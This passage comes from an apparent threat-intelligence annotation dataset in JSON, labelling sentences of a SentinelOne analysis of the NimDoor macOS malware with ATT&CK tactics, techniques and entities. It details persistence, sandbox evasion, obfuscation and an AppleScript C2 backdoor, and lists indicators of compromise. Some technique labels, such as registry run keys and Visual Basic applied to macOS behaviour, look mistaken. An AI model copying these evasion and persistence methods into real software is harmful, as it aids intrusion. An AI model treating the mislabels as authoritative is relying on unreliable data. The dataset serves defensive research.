“po” commands in their analysis.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s76-7a6d90", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 76, "context_before": "Huntress researchers also reported observing a subset of these “po” commands in their analysis.", "sentence_text": "We identified two versions of the installer binary, identical except for the path used to set up the config file used by later stage payloads.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s77-1d1d5d", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 77, "context_before": "We identified two versions of the installer binary, identical except for the path used to set up the config file used by later stage payloads.", "sentence_text": "One version of installer uses /private/tmp/cfg (06566eabf54caafe36ebe94430d392b9cf3426ba) while the other uses /private/tmp/.config (08af4c21cd0a165695c756b6fda37016197b01e7).", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0002", "name": "Execution" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Installer malware uses distinct config file paths with specific hashes", "entities": [ { "text": "installer", "start": 15, "end": 24, "label": "MalwareTool" }, { "text": "/private/tmp/cfg", "start": 30, "end": 46, "label": "Infrastructure_Indicator" }, { "text": "(06566eabf54caafe36ebe94430d392b9cf3426ba)", "start": 47, "end": 89, "label": "Infrastructure_Indicator" }, { "text": "/private/tmp/.config (08af4c21cd0a165695c756b6fda37016197b01e7).", "start": 111, "end": 175, "label": "Infrastructure_Indicator" }, { "text": "uses", "start": 25, "end": 29, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s78-df1e9d", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 78, "context_before": "One version of installer uses /private/tmp/cfg (06566eabf54caafe36ebe94430d392b9cf3426ba) while the other uses /private/tmp/.config (08af4c21cd0a165695c756b6fda37016197b01e7).", "sentence_text": "The file path contents are populated by the next stage GoogIe", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Next-stage malware GoogIe populates configuration file paths", "entities": [ { "text": "GoogIe", "start": 55, "end": 61, "label": "MalwareTool" }, { "text": " are populated by the next stage", "start": 22, "end": 54, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s79-136e60", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 79, "context_before": "The file path contents are populated by the next stage GoogIe", "sentence_text": "LLC and later read by CoreKitAgent GoogIe", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547.001", "name": "Registry Run Keys / Startup Folder" } ], "procedure": "CoreKitAgent GoogIe reads configuration files populated by previous stage", "entities": [ { "text": "CoreKitAgent GoogIe", "start": 22, "end": 41, "label": "MalwareTool" }, { "text": "read by", "start": 14, "end": 21, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s80-132cfe", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 80, "context_before": "LLC and later read by CoreKitAgent GoogIe", "sentence_text": "LLC Compiled from Nim and approximately 195KB, the GoogIe", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s81-8b6632", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 81, "context_before": "LLC Compiled from Nim and approximately 195KB, the GoogIe", "sentence_text": "LLC executable is a universal Mach-O bearing an ad hoc code signature with the identifier user_startup_loader_arm64 .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s82-ecc40e", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 82, "context_before": "LLC executable is a universal Mach-O bearing an ad hoc code signature with the identifier user_startup_loader_arm64 .", "sentence_text": "Interestingly, only the filename for this stage uses the typo spoofing trick; the parent folder /Google LLC/ spells Google correctly with a lowercase “L”.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036.003", "name": "Rename Legitimate Utilities" } ], "procedure": "Filename typo-spoofing to blend in", "entities": [ { "text": " typo spoofing", "start": 56, "end": 70, "label": "Action" }, { "text": "filename for this stage", "start": 24, "end": 47, "label": "MalwareTool" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s83-613f9b", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 83, "context_before": "Interestingly, only the filename for this stage uses the typo spoofing trick; the parent folder /Google LLC/ spells Google correctly with a lowercase “L”.", "sentence_text": "~/Library/Application Support/Google LLC/GoogIe LLC The binary’s primary function is to set up a configuration file and launch the next stage, CoreKitAgent .", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547.001", "name": "Registry Run Keys / Startup Folder" }, { "id": "T1059.004", "name": "Unix Shell" } ], "procedure": "Set up configuration file and launch next stage (CoreKitAgent)", "entities": [ { "text": "The binary", "start": 52, "end": 62, "label": "MalwareTool" }, { "text": "CoreKitAgent", "start": 143, "end": 155, "label": "MalwareTool" }, { "text": "~/Library/Application Support/Google LLC/GoogIe LLC", "start": 0, "end": 51, "label": "Infrastructure_Indicator" }, { "text": "set up a configuration file and launch the next stage", "start": 88, "end": 141, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s84-4ca72e", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 84, "context_before": "~/Library/Application Support/Google LLC/GoogIe LLC The binary’s primary function is to set up a configuration file and launch the next stage, CoreKitAgent .", "sentence_text": "The resulting config file contains a 298 byte string of hexadecimal characters.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s85-0dd281", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 85, "context_before": "The resulting config file contains a 298 byte string of hexadecimal characters.", "sentence_text": "This is later read by CoreKitAgent , which is responsible for writing the LaunchAgent to disk using com.google.update.plist for the Label key and the GoogIe", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1543.001", "name": "Launch Agent" } ], "procedure": "Writing a LaunchAgent plist to disk for persistence.", "entities": [ { "text": "CoreKitAgent", "start": 22, "end": 34, "label": "MalwareTool" }, { "text": "LaunchAgent ", "start": 74, "end": 86, "label": "Infrastructure_Indicator" }, { "text": "com.google.update.plist", "start": 100, "end": 123, "label": "Infrastructure_Indicator" }, { "text": " GoogIe", "start": 149, "end": 156, "label": "Infrastructure_Indicator" }, { "text": "is later read by", "start": 5, "end": 21, "label": "Action" }, { "text": "responsible for writing the LaunchAgent to disk", "start": 46, "end": 93, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s86-50f5f3", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 86, "context_before": "This is later read by CoreKitAgent , which is responsible for writing the LaunchAgent to disk using com.google.update.plist for the Label key and the GoogIe", "sentence_text": "LLC binary for the program argument.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s87-8c49f3", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 87, "context_before": "LLC binary for the program argument.", "sentence_text": "The data written to the config file is used as the value for the LaunchAgent’s CLIENT_AUTH_KEY key.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s88-958d2b", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 88, "context_before": "The data written to the config file is used as the value for the LaunchAgent’s CLIENT_AUTH_KEY key.", "sentence_text": "The first 47 characters of the value of CLIENT_AUTH_KEY are also identical to the first 47 characters (of the total 86) used for the value of SERVER_AUTH_KEY.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s89-0c6920", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 89, "context_before": "The first 47 characters of the value of CLIENT_AUTH_KEY are also identical to the first 47 characters (of the total 86) used for the value of SERVER_AUTH_KEY.", "sentence_text": "When the LaunchAgent is activated by a user login or reboot, GoogIe", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s90-b305e4", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 90, "context_before": "When the LaunchAgent is activated by a user login or reboot, GoogIe", "sentence_text": "LLC is launched, which in turn calls CoreKitAgent and the rest of the payload logic.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204", "name": "User Execution" } ], "procedure": "A malicious binary is launched upon system trigger and subsequently executes additional components (CoreKitAgent and payload logic) to continue attack execution.", "entities": [ { "text": "LLC is launched", "start": 0, "end": 15, "label": "Action" }, { "text": "calls CoreKitAgent", "start": 31, "end": 49, "label": "Action" }, { "text": "CoreKitAgent", "start": 37, "end": 49, "label": "MalwareTool" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s91-b985eb", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 91, "context_before": "LLC is launched, which in turn calls CoreKitAgent and the rest of the payload logic.", "sentence_text": "CoreKitAgent\nOf the four Nim binaries observed, CoreKitAgent is the most technically complex.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s92-283f51", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 92, "context_before": "CoreKitAgent\nOf the four Nim binaries observed, CoreKitAgent is the most technically complex.", "sentence_text": "It exists in both an unsigned stripped (~233KB) version and an ad hoc signed, unstripped (~340KB) version.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s93-c05399", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 93, "context_before": "It exists in both an unsigned stripped (~233KB) version and an ad hoc signed, unstripped (~340KB) version.", "sentence_text": "VirusTotal telemetry indicates that the stripped version was uploaded from South Korea in October 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s94-43e04d", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 94, "context_before": "VirusTotal telemetry indicates that the stripped version was uploaded from South Korea in October 2024.", "sentence_text": "The unstripped version was observed in the wild in early April 2025.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s95-1553d6", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 95, "context_before": "The unstripped version was observed in the wild in early April 2025.", "sentence_text": "Although it is a universal binary, the ad hoc signature identifies the binary as user_startup_main_arm64 The CoreKitAgent program operates as an event-driven application using macOS’s kqueue mechanism.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s96-0ed1cc", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 96, "context_before": "Although it is a universal binary, the ad hoc signature identifies the binary as user_startup_main_arm64 The CoreKitAgent program operates as an event-driven application using macOS’s kqueue mechanism.", "sentence_text": "The _main function sets up Nim’s standard signal handlers and then hands control to an asynchronous continuation function _mainX20X28AsyncX29___user95startup95main_u45 , which initiates the malware’s core logic.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "_main function hands control to async function which initiates malware core logic.", "entities": [ { "text": "initiates the malware’s core logic", "start": 176, "end": 210, "label": "Action" }, { "text": "sets up", "start": 19, "end": 26, "label": "Action" }, { "text": " hands control to", "start": 66, "end": 83, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s97-db0a26", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 97, "context_before": "The _main function sets up Nim’s standard signal handlers and then hands control to an asynchronous continuation function _mainX20X28AsyncX29___user95startup95main_u45 , which initiates the malware’s core logic.", "sentence_text": "Control flow within this function is handled by a 10-case switch statement implemented as a table-driven state machine , with an execution state stored in memory and updated via a lookup table with the following values:\n00 00", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s98-300da5", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 98, "context_before": "Control flow within this function is handled by a 10-case switch statement implemented as a table-driven state machine , with an execution state stored in memory and updated via a lookup table with the following values:\n00 00", "sentence_text": "fe ff 03 00 00 00 fe ff fe ff fe ff fe ff After each case completes, the code consults the lookup table to determine the next state depending on error conditions or specific flags set during execution of the previous case.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s99-f20524", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 99, "context_before": "fe ff 03 00 00 00 fe ff fe ff fe ff fe ff After each case completes, the code consults the lookup table to determine the next state depending on error conditions or specific flags set during execution of the previous case.", "sentence_text": "SIGINT is sent to a process when a user attempts to kill a process (such as by pressing ctl-c in the Terminal).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s100-2205ac", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 100, "context_before": "SIGINT is sent to a process when a user attempts to kill a process (such as by pressing ctl-c in the Terminal).", "sentence_text": "When triggered,\nCoreKitAgent\ncatches these signals and writes the LaunchAgent for persistence, a copy of GoogIe LLC as the loader, and a copy of itself as the trojan, setting executable permissions on the latter two via the addExecutionPermissions_user95startup95mainZutils_u32 function.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1543.001", "name": "Launch Agent" }, { "id": "T1204", "name": "User Execution" } ], "procedure": "CoreKitAgent catches signals and writes LaunchAgent, loader, and trojan copy for persistence, setting executable permissions.", "entities": [ { "text": "CoreKitAgent", "start": 16, "end": 28, "label": "MalwareTool" }, { "text": "GoogIe LLC", "start": 105, "end": 115, "label": "MalwareTool" }, { "text": " itself as the trojan", "start": 144, "end": 165, "label": "MalwareTool" }, { "text": "LaunchAgent", "start": 66, "end": 77, "label": "Infrastructure_Indicator" }, { "text": "addExecutionPermissions_user95startup95mainZutils_u32 function.", "start": 224, "end": 287, "label": "Infrastructure_Indicator" }, { "text": "catches these signals", "start": 29, "end": 50, "label": "Action" }, { "text": "writes the LaunchAgent for persistence", "start": 55, "end": 93, "label": "Action" }, { "text": " setting executable permissions", "start": 166, "end": 197, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s101-8cbed8", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 101, "context_before": "When triggered,\nCoreKitAgent\ncatches these signals and writes the LaunchAgent for persistence, a copy of GoogIe LLC as the loader, and a copy of itself as the trojan, setting executable permissions on the latter two via the addExecutionPermissions_user95startup95mainZutils_u32 function.", "sentence_text": "This behavior ensures that any user-initiated termination of the malware results in the deployment of the core components, making the code resilient to basic defensive actions.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": null, "procedure": "Ensures deployment of core components upon user-initiated termination to resist basic defensive actions.", "entities": [ { "text": "malware ", "start": 65, "end": 73, "label": "MalwareTool" }, { "text": "core components", "start": 106, "end": 121, "label": "MalwareTool" }, { "text": "ensures that any user-initiated termination of the malware results in the deployment", "start": 14, "end": 98, "label": "Action" }, { "text": "making the code resilient to basic defensive actions.", "start": 123, "end": 176, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s102-912886", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 102, "context_before": "This behavior ensures that any user-initiated termination of the malware results in the deployment of the core components, making the code resilient to basic defensive actions.", "sentence_text": "The state machine also contains a 10-minute sleep routine, likely as an anti-VM or sandbox countermeasure.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s103-c3f79f", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 103, "context_before": "The state machine also contains a 10-minute sleep routine, likely as an anti-VM or sandbox countermeasure.", "sentence_text": "void* rax_29 = _sleepAsync__user95startup95main_u73(0x927c0);  // 600,000ms", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s104-2e913e", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 104, "context_before": "void* rax_29 = _sleepAsync__user95startup95main_u73(0x927c0);  // 600,000ms", "sentence_text": "= 10min if (*r12 != 0)\n_eqdestroy___pureZasyncdispatch_u1229(rax_29);  // Error cleanup else { _eqsink___pureZasyncdispatch_u7188(rsi_1 + 0x40, rax_29);  // Store future if (*r12 == 0) { *(r15 + 8) = 7;  //", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s105-28c198", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 105, "context_before": "= 10min if (*r12 != 0)\n_eqdestroy___pureZasyncdispatch_u1229(rax_29);  // Error cleanup else { _eqsink___pureZasyncdispatch_u7188(rsi_1 + 0x40, rax_29);  // Store future if (*r12 == 0) { *(r15 + 8) = 7;  //", "sentence_text": "Rather than just blocking execution for 10 minutes – a technique many sandboxes would detect and counter – it instead registers a wake-up time with a global dispatcher and continues execution of the main event loop.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1497.001", "name": "System Checks" } ], "procedure": "Uses asynchronous scheduling to evade sandbox detection instead of blocking execution for 10 minutes.", "entities": [ { "text": "registers a wake-up time with a global dispatcher", "start": 118, "end": 167, "label": "Action" }, { "text": "continues execution of the main event loop", "start": 172, "end": 214, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s106-0270d2", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 106, "context_before": "Rather than just blocking execution for 10 minutes – a technique many sandboxes would detect and counter – it instead registers a wake-up time with a global dispatcher and continues execution of the main event loop.", "sentence_text": "When the sleep timer expires, CoreKitAgent calls Case 7 and continues execution.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1497.001", "name": "System Checks" } ], "procedure": "Resumes execution by calling Case 7 after sleep timer expires.", "entities": [ { "text": "calls Case 7 and continues execution", "start": 43, "end": 79, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s107-2520df", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 107, "context_before": "When the sleep timer expires, CoreKitAgent calls Case 7 and continues execution.", "sentence_text": "AppleScript Beacon and Backdoor The malware’s custom encryption and obfuscation routines involve multiple passes through several functions.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Applies custom encryption and obfuscation routines across multiple functions.", "entities": [ { "text": "AppleScript Beacon and Backdoor", "start": 0, "end": 31, "label": "MalwareTool" }, { "text": "involve multiple passes through several functions.", "start": 89, "end": 139, "label": "Action" }, { "text": " custom encryption", "start": 45, "end": 63, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s108-d501e5", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 108, "context_before": "AppleScript Beacon and Backdoor The malware’s custom encryption and obfuscation routines involve multiple passes through several functions.", "sentence_text": "Throughout, the authors have broken strings down into character lists to help protect the script from simple scanning rules.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Breaks strings into character lists to evade detection/scanning", "entities": [ { "text": "have broken strings down into character lists ", "start": 24, "end": 70, "label": "Action" }, { "text": "script", "start": 90, "end": 96, "label": "MalwareTool" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s109-d9f74e", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 109, "context_before": "Throughout, the authors have broken strings down into character lists to help protect the script from simple scanning rules.", "sentence_text": "The same trick is used to disguise two hardcoded C2 addresses, writeup[.]live and safeup[.]store On execution, the script beacons out every 30 seconds to one of the two hardcoded C2s, chosen at random, and attempts to post data obtained from listing all running processes on the victim machine.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Disguises C2 addresses, beacons to C2 every 30 seconds, collects process data, posts to C2", "entities": [ { "text": "script", "start": 115, "end": 121, "label": "MalwareTool" }, { "text": "writeup[.]live", "start": 63, "end": 77, "label": "Infrastructure_Indicator" }, { "text": "safeup[.]store", "start": 82, "end": 96, "label": "Infrastructure_Indicator" }, { "text": "disguise two hardcoded C2 addresses", "start": 26, "end": 61, "label": "Action" }, { "text": "beacons out every 30 seconds", "start": 122, "end": 150, "label": "Action" }, { "text": "attempts to post data obtained from listing all running processes ", "start": 206, "end": 272, "label": "Action" }, { "text": "C2 addresses,", "start": 49, "end": 62, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s110-f6f05e", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 110, "context_before": "The same trick is used to disguise two hardcoded C2 addresses, writeup[.]live and safeup[.]store On execution, the script beacons out every 30 seconds to one of the two hardcoded C2s, chosen at random, and attempts to post data obtained from listing all running processes on the victim machine.", "sentence_text": "The script also executes any response received from the C2 via the run script command, meaning this simple AppleScript functions both as a beacon and a backdoor.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1059.005", "name": "Visual Basic" }, { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Executes commands received from C2; functions as beacon and backdoor.", "entities": [ { "text": "script", "start": 4, "end": 10, "label": "MalwareTool" }, { "text": "C2", "start": 56, "end": 58, "label": "Infrastructure_Indicator" }, { "text": "executes any response received from the C2 via the run script command", "start": 16, "end": 85, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s111-f8210f", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 111, "context_before": "The script also executes any response received from the C2 via the run script command, meaning this simple AppleScript functions both as a beacon and a backdoor.", "sentence_text": "The embedded AppleScript in the stripped version of CoreKitAgent takes a different form and uses different embedded C2 server addresses but has similar functionality, including the 30 second delay interval.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1059.005", "name": "Visual Basic" }, { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Maintains beaconing/backdoor functionality with new C2 addresses and 30-second interval.", "entities": [ { "text": "embedded AppleScript in the stripped version of CoreKitAgent", "start": 4, "end": 64, "label": "MalwareTool" }, { "text": "different embedded C2 server addresses ", "start": 97, "end": 136, "label": "Infrastructure_Indicator" }, { "text": "uses different embedded C2 server addresses but has similar functionality", "start": 92, "end": 165, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s112-991a2c", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 112, "context_before": "The embedded AppleScript in the stripped version of CoreKitAgent takes a different form and uses different embedded C2 server addresses but has similar functionality, including the 30 second delay interval.", "sentence_text": "Conclusion\nSentinelLABS’ analysis of NimDoor shows how threat actors are continuing to explore cross-platform languages that introduce new levels of complexity for analysts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s113-6db176", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 113, "context_before": "Conclusion\nSentinelLABS’ analysis of NimDoor shows how threat actors are continuing to explore cross-platform languages that introduce new levels of complexity for analysts.", "sentence_text": "North Korean-aligned threat actors have previously experimented with Go and Rust, similarly combining scripts and compiled binaries into multi-stage attack chains.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s114-1d9479", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 114, "context_before": "North Korean-aligned threat actors have previously experimented with Go and Rust, similarly combining scripts and compiled binaries into multi-stage attack chains.", "sentence_text": "At the same time, the attackers take full advantage of macOS’s built-in scripting capabilities.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Use macOS built-in scripting capabilities for execution.", "entities": [ { "text": "the attackers", "start": 18, "end": 31, "label": "ThreatActor" }, { "text": "take full advantage of macOS’s built-in scripting capabilities", "start": 32, "end": 94, "label": "Action" }, { "text": "macOS’s built-in scripting capabilities", "start": 55, "end": 94, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s115-502824", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 115, "context_before": "At the same time, the attackers take full advantage of macOS’s built-in scripting capabilities.", "sentence_text": "Leveraging AppleScript to perform duties like beaconing is a novel approach that removes the need for a traditional post-exploitation framework and the detection ‘noise’ such implants can create.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Use AppleScript for beaconing to C2", "entities": [ { "text": "AppleScript", "start": 11, "end": 22, "label": "MalwareTool" }, { "text": "perform duties like beaconing", "start": 26, "end": 55, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s116-ea2b18", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 116, "context_before": "Leveraging AppleScript to perform duties like beaconing is a novel approach that removes the need for a traditional post-exploitation framework and the detection ‘noise’ such implants can create.", "sentence_text": "In addition, the use of wss for communications and signal interrupts to trigger persistence logic provide yet further evidence of active development in new ways to defeat security measures.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0003", "name": "Persistence" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1071.001", "name": "Application Layer Protocol: Web Protocols" } ], "procedure": "The malware uses wss for communications and signal interrupts to trigger persistence logic.", "entities": [ { "text": "use of wss for communications", "start": 17, "end": 46, "label": "Action" }, { "text": "wss", "start": 24, "end": 27, "label": "Infrastructure_Indicator" }, { "text": "trigger persistence logic", "start": 72, "end": 97, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s117-2fbd01", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 117, "context_before": "In addition, the use of wss for communications and signal interrupts to trigger persistence logic provide yet further evidence of active development in new ways to defeat security measures.", "sentence_text": "Indicators of Compromise Domains FilePaths ~/Library/Application Support/Google LLC/GoogIe LLC ~/Library/LaunchAgents/com.google.update.plist ~/.ses ~/Library/CoreKit/CoreKitAgent ~/Library/DnsService/a ~/Library/DnsService/netchk /private/tmp/.config /private/tmp/cfg /private/var/tmp/uplex_ / /", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s118-d43900", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 118, "context_before": "Indicators of Compromise Domains FilePaths ~/Library/Application Support/Google LLC/GoogIe LLC ~/Library/LaunchAgents/com.google.update.plist ~/.ses ~/Library/CoreKit/CoreKitAgent ~/Library/DnsService/a ~/Library/DnsService/netchk /private/tmp/.config /private/tmp/cfg /private/var/tmp/uplex_ / /", "sentence_text": "He began his journey into macOS security as a software developer, creating end user troubleshooting and security tools just at the time when macOS adware and commodity malware first began appearing on the platform.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s119-6c4259", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 119, "context_before": "He began his journey into macOS security as a software developer, creating end user troubleshooting and security tools just at the time when macOS adware and commodity malware first began appearing on the platform.", "sentence_text": "Phil has been closely following the development of macOS threats as well as researching Mac software and OS vulnerabilities since 2014.", "relevant": "no", 